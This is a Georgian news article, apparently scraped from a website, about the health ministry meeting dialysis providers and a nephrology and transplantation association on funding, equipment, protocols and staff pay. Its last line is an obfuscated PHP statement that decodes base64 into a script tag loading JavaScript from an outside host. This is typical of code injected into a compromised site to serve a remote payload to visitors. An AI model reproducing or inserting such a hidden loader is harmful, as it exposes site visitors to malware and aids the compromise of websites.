celsiusi
ავერსი საქკაბელი

 ჯანდაცვის სამინისტროში სხვადასხვა სამიზნე ჯგუფთან სამუშაო შეხვედრები იმართება.

ჯანდაცვის მინისტრის მოადგილეები დიალიზის სერვისის მიმწოდებელი დაწესებულებებისა და დიალიზის, ნეფროლოგიისა და თირკმლის ტრანსპლანტაციის კავშირის წარმომადგენლებს შეხვდნენ.
ამის შესახებ ინფორმაციას ჯანდაცვის სამინისტრო ავრცელებს.
უწყების ხელმძღვანელმა პირებმა, სექტორის საჭიროებები მოისმინეს და არსებული გამოწვევების გადაჭრის გზებზე იმსჯელეს.
შეხვედრაზე საუბარი შეეხო დიალიზის სერვისის დაფინანსების, აპარატურის განახლების, ერთიანი სამკურნალო პროტოკოლის შექმნის, სამედიცინო პერსონალის ანაზღაურებისა და მათი უწყვეტი განათლების საკითხებს.
მინისტრის მოადგილის თეა გიორგაძის განცხადებით, სამინისტრო აღნიშნული გამოწვევების გადაჭრის გზებზე იმუშავებს და საკუთარ ხედვებს, სერვისის მიმწოდებელი დაწესებულებებისა და დარგობრივი კავშირის წარმომადგენლებს წარუდგენს.
„აღსანიშნავია, რომ სამინისტროში პერმანენტულად იმართება შეხვედრები და დისკუსიები სხვადასხვა სამიზნე ჯგუფებთან - უშუალოდ ბენეფიციარებთან, ჯანდაცვის სფეროს, სამედიცინო და სოციალური მომსახურებების მიმწოდებელი ორგანიზაციების წარმომადგენლებთან და დაინტერესებულ მხარეებთან.
სამუშაო შეხვედრების მიზანია სამომავლო პრიორიტეტების განსაზღვრა და მომავალი წლის ბიუჯეტის საჭიროებების მიხედვით ფორმირება. ასევე - სახელმწიფო პროგრამების ადმინისტრირების პროცესში გამოვლენილი გამოწვევებისა და მათი დაძლევის შესაძლო გზების განხილვა“, - აღნიშნულია უწყების მიერ გავრცელებულ ინფორმაციაში.
56
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");